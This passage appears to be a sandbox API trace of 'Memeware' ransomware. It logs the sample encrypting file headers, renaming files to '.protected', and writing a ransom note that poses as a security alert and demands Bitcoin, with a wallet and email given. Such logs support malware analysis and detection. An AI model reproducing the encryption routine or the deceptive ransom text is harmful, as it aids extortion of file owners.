pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned 117 [0075.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0075.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.050] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\.") returned 117 [0075.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.050] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.050] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.050] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.050] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.050] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.050] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.050] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\..") returned 118 [0075.050] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.050] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0075.050] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.050] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0075.050] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0075.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.051] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0075.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.051] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0075.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.051] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0075.051] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.066] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.066] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.079] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.079] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.081] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.081] CloseHandle (hObject=0xd8) returned 1 [0075.081] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 134 [0075.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.protected")) returned 1 [0075.082] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Windows") returned -1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files") returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files (x86)") returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$Recycle.bin") returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="System Volume Information") returned 1 [0075.082] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.082] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".protected") returned 0x0 [0075.082] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0075.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.082] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.083] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0075.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.083] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".rar") returned 0x0 [0075.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.083] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".zip") returned 0x0 [0075.083] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.085] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.085] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.086] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.086] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.086] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.086] CloseHandle (hObject=0xd8) returned 1 [0075.087] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 154 [0075.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.protected")) returned 1 [0075.088] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0075.088] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0075.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 133 [0075.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0075.094] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.094] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0075.095] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.095] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0075.095] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.095] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0075.095] CloseHandle (hObject=0xd4) returned 1 [0075.096] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0075.096] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0075.096] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0075.096] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.097] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.097] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0075.097] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.097] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0075.098] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.098] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0075.098] CloseHandle (hObject=0xb4) returned 1 [0075.098] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.098] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.099] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0075.099] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.099] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.099] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.100] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.100] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.100] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.100] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0075.100] CloseHandle (hObject=0xa4) returned 1 [0075.100] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="Windows") returned -1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="Program Files") returned -1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="System Volume Information") returned -1 [0075.100] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 82 [0075.100] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2=".") returned 1 [0075.100] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="..") returned 1 [0075.100] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned 84 [0075.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", 